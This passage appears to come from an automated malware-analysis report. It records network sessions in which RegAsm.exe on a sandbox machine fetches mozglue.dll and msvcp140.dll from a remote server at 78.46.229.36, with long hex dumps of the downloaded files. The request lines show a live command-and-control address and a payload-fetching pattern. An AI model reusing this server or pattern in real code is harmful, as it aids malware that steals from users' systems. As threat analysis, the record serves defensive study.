e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49719	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:05 UTC	205	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 19:35:06 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:06 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-03-28 19:35:06 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-03-28 19:35:06 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-03-28 19:35:06 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-03-28 19:35:06 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-03-28 19:35:06 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
2024-03-28 19:35:06 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-03-28 19:35:06 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-03-28 19:35:06 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-03-28 19:35:06 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-03-28 19:35:06 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49720	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:07 UTC	206	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 19:35:08 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:07 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-03-28 19:35:08 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-03-28 19:35:08 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-03-28 19:35:08 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-03-28 19:35:08 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-03-28 19:35:08 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-03-28 19:35:08 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-03-28 19:35:08 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-03-28 19:35:08 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-03-28 19:35:08 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-03-28 19:35:08 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49724	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
